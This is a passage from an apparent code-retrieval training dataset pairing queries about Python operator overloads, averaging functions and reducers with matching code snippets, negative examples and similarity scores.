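The row above pairs the query "overload + which is useful for averaging" with an `__add__` that sums each name in `self._fields`, and the row that follows pairs the matching `/` query with the analogous `__truediv__`. As a hedged illustration of how these two overloads combine to average a sequence of records, here is a minimal, self-contained sketch; the `Stats` class, its field names, and the sample values are hypothetical stand-ins for illustration only, not taken from the dataset:

# Minimal sketch (hypothetical names): field-wise + and / overloads enable averaging.
class Stats:
    _fields = ("loss", "accuracy")  # hypothetical field names

    def __init__(self, loss, accuracy):
        self.loss = loss
        self.accuracy = accuracy

    def __add__(self, other):
        # Field-wise sum, in the spirit of the __add__ document in the row above.
        return self.__class__(*(getattr(self, f) + getattr(other, f) for f in self._fields))

    def __truediv__(self, number):
        # Field-wise division by a scalar, in the spirit of the row that follows.
        return self.__class__(*(getattr(self, f) / number for f in self._fields))

batches = [Stats(0.9, 0.70), Stats(0.7, 0.75), Stats(0.5, 0.80)]  # illustrative values
total = batches[0]
for s in batches[1:]:
    total = total + s
average = total / len(batches)
print(average.loss, average.accuracy)  # ~0.7 0.75 (up to float rounding)

Defining both overloads is what lets plain accumulation with `+` followed by a single division by the count produce a field-wise average without handling each attribute separately.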
overload / for scalars which is useful for averaging | def __truediv__(self, number):
return self.__class__(
{
name:
self.__getattribute__(name) / number
for name in self._fields
}
) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def mean(vals):",
"def avg(a,b):\r\n return (a+b)/2",
"def scalar_function(x, y):\n if x <= y:\n return x*y\n else:\n return x/y",
"def mean(values):\r\n return sum(values) / float(len(values))",
"def avg(u: np.ndarray, v: np.ndarray) -> np.ndarray:\n \n return (u + v) / 2.0",
"def mean(*a):\n return numpy.mean(*a) # pylint: disable=no-value-for-parameter",
"def mean(arr) -> float:\n return sum(arr) / len(arr)",
"def numeric(*args):",
"def mean(v):\n return sum(v)/len(v)",
"def mean(x):\n return sum(x) / len(x)",
"def mean_value( values ):\n return sum( values ) / len( values )",
"def mean(x):\n return sum(x)/len(x)",
"def mean(series):\n return fsum(series) / len(series)",
"def avg(x, y):\n return (x + y)/2",
"def average(arg1, *args): \n return (arg1 + sum(args)) / (1 + len(args))",
"def calc_mean(sig):\n # m = mean(sig)\n return np.mean(sig)",
"def scalar_function(x, y):\n #Your code here\n if x<=y:\n fs = x*y\n else:\n fs = x/y\n return fs\n raise NotImplementedError",
"def d_mean(x, y):\n return (x + y) / 2",
"def avg(values):\n return sum(values) / float(len(values))",
"def find_arithmetic_mean( *args):\n sum = 0\n for value in args:\n sum += value\n return sum/len(args)",
"def mean(values):\n # Write the mean() function\n mean = sum(values) / len(values)\n return mean",
"def __truediv__(self, scalar):\n return self.div(scalar)",
"def is_scalar(self):",
"def my_mean(x):\n return my_sum(x) / my_len(x)",
"def test_mixeddiv():\r\n i = iscalar()\r\n d = dscalar()\r\n assert 0 == function([i, d], d * (i // (i + 1)))(3, 1.0)",
"def mean(values):\n # Write the mean() function\n mean = sum(values) / len(values)\n return mean",
"def mean(values):\n total = sum(values)\n len_values = len(values)\n return total/len_values",
"def _mean(items):\n return sum(items) / len(items)",
"def avg(arr):\n return sum(arr) / float(len(arr))",
"def average(values):\n return sum(values) / len(values)",
"def average(values):\n return sum(values) / len(values)",
"def average(values):\n\treturn sum(values)/len(values)",
"def average(data):\n return np.average(data)",
"def ave(values):\n return float(sum(values))/len(values)",
"def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))",
"def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))",
"def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))",
"def scalar():\n # noinspection PyUnusedLocal\n def sf(x, params, const_list, const_dict):\n a = params[0]\n return a\n return FitFunction(func=sf, num_fit_params=1, name='scalar', code='s')",
"def ageometricmean (inarray,dimension=None,keepdims=0):\r\n inarray = N.array(inarray,N.float_)\r\n if dimension == None:\r\n inarray = N.ravel(inarray)\r\n size = len(inarray)\r\n mult = N.power(inarray,1.0/size)\r\n mult = N.multiply.reduce(mult)\r\n elif type(dimension) in [IntType,FloatType]:\r\n size = inarray.shape[dimension]\r\n mult = N.power(inarray,1.0/size)\r\n mult = N.multiply.reduce(mult,dimension)\r\n if keepdims == 1:\r\n shp = list(inarray.shape)\r\n shp[dimension] = 1\r\n sum = N.reshape(sum,shp)\r\n else: # must be a SEQUENCE of dims to average over\r\n dims = list(dimension)\r\n dims.sort()\r\n dims.reverse()\r\n size = N.array(N.multiply.reduce(N.take(inarray.shape,dims)),N.float_)\r\n mult = N.power(inarray,1.0/size)\r\n for dim in dims:\r\n mult = N.multiply.reduce(mult,dim)\r\n if keepdims == 1:\r\n shp = list(inarray.shape)\r\n for dim in dims:\r\n shp[dim] = 1\r\n mult = N.reshape(mult,shp)\r\n return mult",
"def AVERAGE(nums):\n if type(nums) == list or type(nums) == np.ndarray:\n return(np.mean(nums))\n else:\n print('Invalid type: nums needs to be a list or numpy array.')",
"def har_mean(array):\n return ((sum([1/x for x in array]))**(-1))*len(array)",
"def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1 / n, vector_sum(vectors))",
"def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1 / n, vector_sum(vectors))",
"def mean(self):\n\t\treturn 0. #obtained by integrating 1.5x^3 from -1 to 1",
"def _mean(listvalue):\n\treturn sum(listvalue)/len(listvalue)",
"def find_mean(values):\n return sum(values) / len(values)",
"def numerator(self, ???):",
"def geometric_mean(xs):\n p = 1.0\n for num in xs:\n p = p * num\n return (p)**(1.0/len(xs))",
"def average(self):\n s = self.sum()\n flat_shape = self.flatten_shape(self.shape)\n num_of_elements = fct.reduce(opr.mul, flat_shape, 1)\n average = s / num_of_elements\n return average",
"def numpy_mean(arr):\n return arr.mean()",
"def mean_square_value( values ):\n return sum( [ i**2 for i in values] ) / len( values )",
"def __itruediv__(self, scalar):\n return self.div_(scalar)",
"def test_mean_custom_dtype(self):\r\n # We try multiple axis combinations even though axis should not matter.\r\n axes = [None, 0, 1, [], [0], [1], [0, 1]]\r\n idx = 0\r\n for input_dtype in imap(str, theano.scalar.all_types):\r\n x = tensor.matrix(dtype=input_dtype)\r\n for sum_dtype in imap(str, theano.scalar.all_types):\r\n axis = axes[idx % len(axes)]\r\n # If the inner sum cannot be created, it will raise a\r\n # TypeError.\r\n try:\r\n mean_var = x.mean(dtype=sum_dtype, axis=axis)\r\n except TypeError:\r\n pass\r\n else:\r\n # Executed if no TypeError was raised\r\n if sum_dtype in tensor.discrete_dtypes and axis != []:\r\n assert mean_var.dtype == 'float64', (\r\n (mean_var.dtype, sum_dtype))\r\n else:\r\n assert mean_var.dtype == sum_dtype, (\r\n (mean_var.dtype, sum_dtype))\r\n if (('complex' in input_dtype or\r\n 'complex' in sum_dtype) and\r\n input_dtype != sum_dtype):\r\n continue\r\n f = theano.function([x], mean_var)\r\n data = numpy.random.rand(3, 4) * 10\r\n data = data.astype(input_dtype)\r\n f(data)\r\n # Check that we can take the gradient, when implemented\r\n if \"complex\" in mean_var.dtype:\r\n continue\r\n try:\r\n tensor.grad(mean_var.sum(), x,\r\n disconnected_inputs='ignore')\r\n except NotImplementedError:\r\n # TrueDiv does not seem to have a gradient when\r\n # the numerator is complex.\r\n if mean_var.dtype in tensor.complex_dtypes:\r\n pass\r\n else:\r\n raise\r\n\r\n idx += 1",
"def mean(xs):\n ave = 0\n for xs_split in xs:\n num = float(xs_split)\n print(xs_split)\n ave = ave+num\n average = ave/len(xs)\n return average",
"def add_mean(mean):\n return sum(mean)/len(mean)",
"def average(x, y):\n #helper function for get_accuracy\n average = (x+y)/2 \n return average",
"def __div__(self, _scalar):\n\t\tans = copy.deepcopy(self)\n\t\tfor i in range(0, self.n):\n\t\t\t\tans[i] /= _scalar\n\t\treturn ans",
"def mean(a, b):\n with mp.extradps(5):\n a, b = _validate_a_b(a, b)\n return a/(a + b)",
"def mean(items):\n\n return float(sum(items)) / len(items)",
"def __float__(self):\n if (self.nvar == 0): return self.t[0]\n else: raise ValueError(\"Factor is not a scalar; scope {}\".format(self.v))",
"def get_mean(iterable):\n return sum(iterable) / len(iterable)",
"def hmean(x, y):\n if x == y:\n return float(x)\n elif x == 0.0 or y == 0.0:\n return 0.0\n else:\n return 2.0 * _div(x * y, x + y)",
"def mean(L):\n\treturn sum(L) / len(L)",
"def fmean(items):\n if len(items) == 0:\n return 0.\n\n return fsum(items) / float(len(items))",
"def _avg(value1, value2, weight):\r\n if value1 is None:\r\n return value2\r\n if value2 is None:\r\n return value1\r\n return value2 * weight + value1 * (1 - weight)",
"def _avg(value1, value2, weight):\r\n if value1 is None:\r\n return value2\r\n if value2 is None:\r\n return value1\r\n return value2 * weight + value1 * (1 - weight)",
"def mean(array: list) -> float:\n\n arr_sum = 0\n\n for element in array:\n arr_sum = arr_sum + element\n\n return arr_sum/len(array)",
"def mean(points):\r\n\t\treturn sum(points)/len(points)",
"def vector_mean(vectors: List[Vector]) -> Vector:\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))",
"def vector_mean(vectors: List[Vector]) -> Vector:\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))",
"def mean(X, shape):\n return np.real(X[0, 0]) / (shape[0] * shape[1])",
"def test_scalar_division(self):\n\n a1 = tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 1, -2, 3, -4)\n\n a2 = a1 / 2\n\n self.assertEqual(a2,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 0.5, -1, 1.5, -2))",
"def num (self):\n return self.value[0]/self.value[1]",
"def compute(self, node, input_vals):\r\n assert len(input_vals) == 1\r\n if node.const_attr!=None:\r\n return np.array(np.mean(input_vals[0], node.const_attr))\r\n else:\r\n return np.array(np.mean(input_vals[0]))",
"def amean (inarray,dimension=None,keepdims=0):\r\n if inarray.dtype in [N.int_, N.short,N.ubyte]:\r\n inarray = inarray.astype(N.float_)\r\n if dimension == None:\r\n inarray = N.ravel(inarray)\r\n sum = N.add.reduce(inarray)\r\n denom = float(len(inarray))\r\n elif type(dimension) in [IntType,FloatType]:\r\n sum = asum(inarray,dimension)\r\n denom = float(inarray.shape[dimension])\r\n if keepdims == 1:\r\n shp = list(inarray.shape)\r\n shp[dimension] = 1\r\n sum = N.reshape(sum,shp)\r\n else: # must be a TUPLE of dims to average over\r\n dims = list(dimension)\r\n dims.sort()\r\n dims.reverse()\r\n sum = inarray *1.0\r\n for dim in dims:\r\n sum = N.add.reduce(sum,dim)\r\n denom = N.array(N.multiply.reduce(N.take(inarray.shape,dims)),N.float_)\r\n if keepdims == 1:\r\n shp = list(inarray.shape)\r\n for dim in dims:\r\n shp[dim] = 1\r\n sum = N.reshape(sum,shp)\r\n return sum/denom",
"def __div__(self, other):\r\n T = type(other)\r\n # mat4/scalar\r\n if T==types.FloatType or T==types.IntType or T==types.LongType:\r\n return mat4(map(lambda x,other=other: x/other, self.mlist))\r\n # unsupported\r\n else:\r\n raise TypeError, \"unsupported operand type for /\"",
"def avg(vector):\n if len(vector) == 0:\n return 0\n return sum(vector) / len(vector)",
"def __div__(self, other):\r\n T = type(other)\r\n # vec4/scalar\r\n if T==types.FloatType or T==types.IntType or T==types.LongType:\r\n return vec4(self.x/other, self.y/other, self.z/other, self.w/other)\r\n # unsupported\r\n else:\r\n raise TypeError, \"unsupported operand type for /\"",
"def mean(numbers):\n return float(sum(numbers)) / float(len(numbers))",
"def mean(data):\n n = len(data)\n return sum(data)/float(n)",
"def scalar_mult(diagram, scalar):\n raise NotImplementedError",
"def scalar_divide(x, y):\n if len(list(x.size())) == 2 or len(list(x.size())) == 1:\n y_star = torch.zeros_like(y)\n y_star[0] = y[0]\n y_star[1] = -y[1]\n\n numerator = scalar_mult(y_star, x)\n denominator = scalar_mult(y, y_star)[0]\n\n if len(list(x.size())) == 3:\n y_star = torch.zeros_like(y)\n y_star[0] = y[0]\n y_star[1] = -y[1]\n\n numerator = scalar_mult(y_star, x)\n denominator = scalar_mult(y, y_star)[0]\n\n return numerator / denominator",
"def vector_mean(vectors: List[Vector]) -> Vector:\n n = len(vectors)\n\n return scalar_multiply(1/n, vector_sum(vectors))",
"def get_mean(cls, data: tuple or list) -> float:\n cls._data_validation(data)\n sum_ = fsum(data)\n n = cls.get_n(data)\n try:\n return float(sum_ / n)\n except ZeroDivisionError as exc:\n # for hyp score calculation, n = 0 for empty set is useful\n return 0",
"def geometric_mean(data):\n return pow(reduce(lambda v, mem: v * mem, data, 1.0), 1 / float(len(data)))",
"def to_scalar(self, v):\n raise NotImplementedError('to_scalar')",
"def __div__(self, scalar):\n return Vector(self.x / scalar, self.y / scalar)",
"def __call__(self, *args):\n if isinstance(args[0], (float, int, complex)):\n # scalar version:\n return self.constant\n else:\n # vectorized version:\n r = args[0].copy()\n # to get right dimension of the return array,\n # compute with args in a simple formula (sum of args)\n for a in args[1:]:\n r = r + a # in-place r+= won't work\n # (handles x,y,t - the last t just adds a constant)\n r[:] = self.constant\n return r",
"def avg(iterable: Iterable[Num]) -> float:\n\t\n\tsum_nums = 0\n\tnums = 0\n\t\n\tfor num in iterable:\n\t\tsum_nums += num\n\t\tnums += 1\n\t\n\treturn sum_nums / nums",
"def avg():\n\n # call sum method to add up the values in the collection & div by the num of items\n # call len method to compute the # of vals in collection which is divided by sum total \n mean = sum(inlist) / len(inlist)\n return mean \n\n # alternate method would be calling the reduce method with lamda \n # return reduce(lambda a, b: a + b, inlist) / len(inlist)",
"def function2(a, b):\r\n average = (a + b) / 2\r\n return average",
"def get_mean(self, X):\n raise NotImplementedError",
"def denominator(self, ???):",
"def mean(inputs):\n # pylint disable necessary for numpy and pandas\n if len(inputs) == 0: # pylint: disable=g-explicit-length-test\n return 0\n else:\n return np.mean(inputs)",
"def average(num1, num2):\n\n return (num1 + num2) / 2",
"def get_mean(numlist):\n return np.mean(numlist)",
"def combine_scalars(values, alpha=0.1):\n values = [x for x in values if x]\n if not values:\n return None\n try:\n mean = np.mean(values)\n stddev = np.std(values)\n except:\n print(values)\n raise\n if stddev > alpha * mean:\n return None\n return mean",
"def __rdiv__(self, _scalar):\n\t\treturn self / _scalar",
"def mean(a_series):\n return float(sum(a_series) / max(len(a_series) * 1.0, 1.0))",
"def scalar(f):\n def g(X: tuple()):\n return Scalar(f(Scalar(X)))\n return g",
"def calc_mean(a, b, c, d, e):\n return (a + b + c + d + e) / 5"
] | [
"0.696143",
"0.6685009",
"0.65835285",
"0.6494379",
"0.6486431",
"0.647589",
"0.6461953",
"0.644082",
"0.640487",
"0.63789093",
"0.6378846",
"0.6364099",
"0.6329329",
"0.6322551",
"0.6314783",
"0.6298621",
"0.6284843",
"0.62669075",
"0.62524444",
"0.62499195",
"0.6235518",
"0.6224494",
"0.620951",
"0.62045795",
"0.6184314",
"0.61744523",
"0.6156649",
"0.61536336",
"0.61092",
"0.608809",
"0.608809",
"0.6083761",
"0.60720074",
"0.6049691",
"0.60438657",
"0.60438657",
"0.60438657",
"0.6039313",
"0.6033236",
"0.603303",
"0.6021092",
"0.60003066",
"0.60003066",
"0.5996805",
"0.59888446",
"0.597899",
"0.5974496",
"0.5968048",
"0.5968044",
"0.5965595",
"0.59628564",
"0.5960565",
"0.5930119",
"0.5929627",
"0.59238744",
"0.59116936",
"0.5911656",
"0.59055835",
"0.5903044",
"0.5887971",
"0.588715",
"0.58865273",
"0.58807707",
"0.58740383",
"0.58733857",
"0.58733857",
"0.58651567",
"0.5864459",
"0.5863824",
"0.5863824",
"0.58585995",
"0.5855774",
"0.5850479",
"0.5844424",
"0.5830256",
"0.5825727",
"0.5823594",
"0.5821502",
"0.58199716",
"0.5811106",
"0.58067805",
"0.5803852",
"0.5802347",
"0.57908213",
"0.5786453",
"0.57859576",
"0.5769224",
"0.5767026",
"0.5761916",
"0.57589",
"0.5758136",
"0.575623",
"0.5752087",
"0.5750081",
"0.5745936",
"0.57306194",
"0.572675",
"0.57253647",
"0.57092756",
"0.5703564",
"0.569568"
] | 0.0 | -1 |
overload == which is useful for tests | def __eq__(self, other):
return np.all([
self.__getattribute__(name) == other.__getattribute__(name)
for name in self._fields
]) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def testEquality(self):\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self,*args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self, *args):\r\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,*args):\n pass",
"def __eq__(self,other):\n return self is other",
"def is_equal(self, a, b):\n return a == b",
"def equals(self, other): # -> bool:\n ...",
"def __eq__(self, other):\n return self is other",
"def __eq__(self, other):\n return self is other",
"def test_equal(self):\n self.assertTrue(self.a == self.a)\n self.assertFalse(self.a != self.a)",
"def __eq__(self: _TT, other: object) -> bool:\n return self.eq(other) # type: ignore",
"def __eq__(self, other):\n pass",
"def __eq__(self, other):\n pass",
"def is_equal(self, a, b):\n return a is b",
"def __eq__(self, other):\n return equal(self, other)",
"def __eq__(self, oth):\n return int(self) != oth",
"def test_eq(self):\n dummy = DummyCryptographicObject()\n self.assertTrue(dummy == dummy)",
"def equals(x, y):\n return x == y",
"def __eq__(self, other):\n return self.value == other.value",
"def values_eq(self, a, b):\r\n return a == b",
"def __eq__(self, other):\n return are_equal(self, other)",
"def __eq__(self, other):\n return are_equal(self, other)",
"def __eq__(self, argument):\n return super().__eq__(argument)",
"def __eq__(self, other):\n if other != None:\n return self == other\n else:\n return False",
"def __eq__(self, other):\n if other != None:\n return self == other\n else:\n return False",
"def __eq__(self, other: t.Any) -> bool:\n return self._op_bool('__eq__', other)",
"def __eq__(self, other):\r\n if other is not None:\r\n return self.value() == other.value()\r\n else:\r\n return False",
"def __eq__(self, other):\n raise NotImplementedError",
"def __eq__(self, other):\n raise NotImplementedError",
"def __eq__(self, other):\n raise NotImplementedError",
"def __eq__(self, other):\n return self.value == other or self.value == other.value",
"def exact(cls, lhs, rhs):\n return lhs == rhs",
"def __eq__(self, other):\n return self.is_(other)",
"def __eq__(self, other):\r\n return self.__name == other.__name",
"def __eq__(self, other):\r\n return self.__name == other.__name",
"def test_equality(self):\n # Make explicitly sure we're using ==:\n self.assertTrue(Comparable(1) == Comparable(1))\n self.assertFalse(Comparable(2) == Comparable(1))",
"def __eq__(self,other):\n try: return self.object==other.object and isinstance(self,type(other))\n except: return False",
"def __eq__(self, v):\n\t\treturn self is v or (self.__class__ == v.__class__ and self.AEM_comparable() == v.AEM_comparable())",
"def __eq__(self, other):\n raise NotImplementedError()",
"def same_as(self, other):\n return super().__eq__(other)",
"def __eq__(self, other):\n return isinstance(other, self.__class__)",
"def __eq__(self, other):\r\n\t\tif self.eqHash == other.eqHash:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False",
"def __eq__(self, other):\n if other is None:\n return False\n if self.value == other.value:\n return True\n return False",
"def __eq__(self, other) -> bool:\n return str(self) == str(other)",
"def __eq__(self, other):\n\n if type(other) != type(self):\n return False\n if other.description != self.description:\n return False\n if other.func != self.func:\n return False\n return True",
"def test_eq_invalid(self):\n self.assertFalse(self.instance == '123')",
"def __eq__(self, other):\r\n\t\treturn (self.type == other.type and self.value == other.value)",
"def __eq__(self, other):\n return self.__dict__ == other",
"def __eq__(self, name):\n return self.name == name",
"def test_eq_true(self):\n other = Sample(self.sample_id, self.sample_template)\n self.assertTrue(self.tester == other)",
"def __eq__(self, other):\n return str(self) == str(other)",
"def __eq__(self, other):\n return str(self) == str(other)",
"def __eq__(self, other):\n return str(self) == str(other)",
"def __eq__( self, other ):\n return self.data == other.data",
"def __eq__(self, other):\r\n return self.__dict__ == other.__dict__",
"def __eq__(self, other):\n return (str(self) == str(other))",
"def is_equal(o1: object, o2: object) -> bool:\n if o1 is None and o2 is None:\n return True\n if o1 is None:\n return False\n return o1 == o2",
"def __eq__(self, other):\n raise NotImplementedError('must be implemented by subclass')",
"def __eq__(self, frac):\n return self.equal == frac.equal",
"def __eq__(self, other):\n return self.name == other.name",
"def testEqual(a, b):\n if a == b:\n print('Pass')\n else:\n print('Fail')",
"def __eq__(self, rhs):\n result = False\n \n if self.code == rhs.code:\n result = True\n \n return result"
] | [
"0.8219239",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.8051525",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.79099905",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7776272",
"0.7751492",
"0.7740263",
"0.76543874",
"0.7645492",
"0.7645492",
"0.7641876",
"0.7596806",
"0.7587007",
"0.7587007",
"0.75818574",
"0.7546607",
"0.7509322",
"0.74750394",
"0.74706537",
"0.74341655",
"0.74336994",
"0.7433473",
"0.7433473",
"0.74080026",
"0.7403467",
"0.7403467",
"0.73924834",
"0.7377648",
"0.73676944",
"0.73676944",
"0.73676944",
"0.7349434",
"0.73456836",
"0.7316528",
"0.73100245",
"0.73100245",
"0.7289215",
"0.7282583",
"0.7270293",
"0.72636086",
"0.72622114",
"0.72579664",
"0.7255045",
"0.72286105",
"0.72181785",
"0.72124237",
"0.7205996",
"0.7200204",
"0.7183714",
"0.7179569",
"0.71617496",
"0.7161007",
"0.7161007",
"0.7161007",
"0.715812",
"0.7148745",
"0.71416396",
"0.71382993",
"0.7132677",
"0.7124439",
"0.7115531",
"0.71118087",
"0.710934"
] | 0.0 | -1 |
Default reducer for distinctions. Expects all distinctions to follow | def __reduce__(self):
return instanceReducer(self) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def __reduce__(self):\n\t\treturn self.__class__, (self.dist, self.frozen)",
"def evaluation_reducer(self) -> Union[Reducer, Dict[str, Reducer]]:\n return Reducer.AVG",
"def __reduce__(self): # real signature unknown; restored from __doc__\r\n pass",
"def _reduce(self, action):\n assert len(self.stack) >= 2, \"ERROR: Cannot reduce with stack length less than 2\"\n \n # STUDENT\n # hint: use list.pop()\n # END STUDENT\n rightarc = self.stack.pop()\n leftarc = self.stack.pop()\n head = rightarc if action == Actions.REDUCE_L else leftarc\n mod = leftarc if action == Actions.REDUCE_L else rightarc\n self.stack.append( StackEntry(head.headword, head.headword_pos, self.combiner(head.embedding,mod.embedding)) )\n return DepGraphEdge((head.headword, head.headword_pos),(mod.headword, mod.headword_pos))",
"def __reduce__(self, *args, **kwargs): # real signature unknown\n pass",
"def __reduce__(self, *args, **kwargs): # real signature unknown\n pass",
"def __reduce__(self, *args, **kwargs): # real signature unknown\n pass",
"def __reduce__(self, *args, **kwargs): # real signature unknown\n pass",
"def __reduce__(self, *args, **kwargs): # real signature unknown\n pass",
"def reduce(self, reduce_op, value, axis): # pylint: disable=useless-super-delegation\n return super(OneDeviceStrategy, self).reduce(reduce_op, value, axis)",
"def __reduce__(self, *args, **kwargs) -> Any:\n ...",
"def set_gate_reducer(self, reducer: ReductionRule):\n self.gate_reducer_ = reducer",
"def toposorted_actions(self) -> Iterable[Action]:\n # Here we execute two \"nanopasses\" (a term borrowed from compiler implementation)\n #\n # 1. Traverse a values-and-actions graph, reducing it to a dependency graph containing actions\n #\n # 2. Perform a toposort over actions (using Kahn's algorithm https://en.wikipedia.org/wiki/Topological_sorting)\n #\n # TODO: switch to graphlib from standard library\n #\n # TODO: Consider using Tarjan's strongly connected components algorithm\n # Rationale: Tarjan's SCC would find loops and produce a helpful diagnostic\n\n # 1. Dependency graph representation optimized for toposort\n o: dict[Action, set[Action]] = {} # for actions: action -> set of outgoing dependency edges\n i: dict[Action, set[Action]] = {} # for actions: action -> set of incoming dependency edges\n\n # set of nodes without incoming edges\n s: Set[Action] = set()\n\n # 1. Transform execution plan into dependency graph\n for action in self.actions:\n # if action does not depend on any other action, add it to set s\n if all(inp.producer() is None for inp in action.inputs()):\n s.add(action)\n # add outgoing edges to graph, if any\n for output in action.outputs():\n for depending_action in output.consumers():\n # add an edge action -> depending_action to the graph\n if action not in o:\n o[action] = set()\n if depending_action not in i:\n i[depending_action] = set()\n o[action].add(depending_action)\n i[depending_action].add(action)\n\n # 2. Now run Kahn's algorithm (could be separated from previous to improve abstraction)\n # resulting list\n l: list[Action] = []\n\n while len(s) > 0:\n n = s.pop()\n l.append(n)\n if n in o:\n o_n = o[n]\n del o[n]\n else:\n o_n = set()\n while len(o_n) > 0:\n # remove edge from the graph\n m = o_n.pop()\n i[m].remove(n)\n if len(i[m]) == 0:\n del i[m]\n s.add(m)\n\n if len(o) != 0 or len(i) != 0:\n for (node, edges) in o.items():\n print(\"Source: \" + str(node))\n for e in edges:\n print(\" Edge: \" + str(e))\n raise Exception(\"Dependency graph has at least one cycle\")\n else:\n return l",
"def category_reducer(category):\n if not \"--\" in category:\n if category in BAD_CATEGORIES:\n return \"Unknown\"\n return category\n\n main, sub = category.split(\"--\")\n\n main = main.strip()\n if main in [\"Science\"]:\n return sub.strip()\n else:\n return main",
"def _call_reduce_action(self, context, subresults):\n debug = self.debug\n result = None\n bt_result = None\n production = context.production\n\n if self.build_tree:\n # call action for building tree node if enabled.\n if debug:\n h_print(\"Building non-terminal node\",\n \"'{}'.\".format(production.symbol.name), level=2)\n\n bt_result = NodeNonTerm(context, children=subresults,\n production=production)\n context.node = bt_result\n if not self.call_actions_during_tree_build:\n return bt_result\n\n sem_action = production.symbol.action\n if sem_action:\n assignments = production.assignments\n if assignments:\n assgn_results = {}\n for a in assignments.values():\n if a.op == '=':\n assgn_results[a.name] = subresults[a.index]\n else:\n assgn_results[a.name] = bool(subresults[a.index])\n\n if type(sem_action) is list:\n if assignments:\n result = sem_action[production.prod_symbol_id](\n context, subresults, **assgn_results)\n else:\n result = sem_action[production.prod_symbol_id](context,\n subresults)\n else:\n if assignments:\n result = sem_action(context, subresults, **assgn_results)\n else:\n result = sem_action(context, subresults)\n\n else:\n if debug:\n h_print(\"No action defined\",\n \" for '{}'.\".format(production.symbol.name), level=1)\n if len(subresults) == 1:\n if debug:\n h_print(\"Unpacking a single subresult.\", level=1)\n result = subresults[0]\n else:\n if debug:\n h_print(\"Result is a list of subresults.\", level=1)\n result = subresults\n\n if debug:\n h_print(\"Action result =\",\n \"type:{} value:{}\"\n .format(type(result), repr(result)), level=1)\n\n # If build_tree is set to True, discard the result of the semantic\n # action, and return the result of treebuild_reduce_action.\n return bt_result if bt_result is not None else result",
"def reduce(self, app, nodes, result):",
"def _reduce_distances(self, threshold):\n reduced = self.orig_dists.copy()\n reduced[reduced <= threshold] = 0\n # Remove ignored from all consideration\n ignrd_indices = [self.index[name] for name in self.ignored]\n if ignrd_indices:\n reduced[:,ignrd_indices] = np.inf\n reduced[ignrd_indices,:] = np.inf\n # Check if the given parameters are feasible\n chsn_indices = set(self.index[name] for name in self.chosen)\n avail_indices = set(self.index[name] for name in self.available)\n ca_indices = chsn_indices | avail_indices\n unassigned_indices = np.array(list(self._not_ignored_inds - ca_indices))\n if len(unassigned_indices) == 0:\n unassigned_orphans = unassigned_indices\n else:\n ca_indices = list(ca_indices)\n avail_in_range = np.count_nonzero(reduced[np.ix_(unassigned_indices,ca_indices)] == 0, axis=1)\n unassigned_orphans = unassigned_indices[avail_in_range == 0]\n return reduced, unassigned_orphans",
"def allreduce_hook(state: AllReduceState, grad: torch.Tensor):\n if state.gradient_predivide_factor > 1:\n grad.div_(state.gradient_predivide_factor)\n dist.all_reduce(grad, group=state.process_group)\n if state.gradient_postdivide_factor > 1:\n grad.div_(state.gradient_postdivide_factor)",
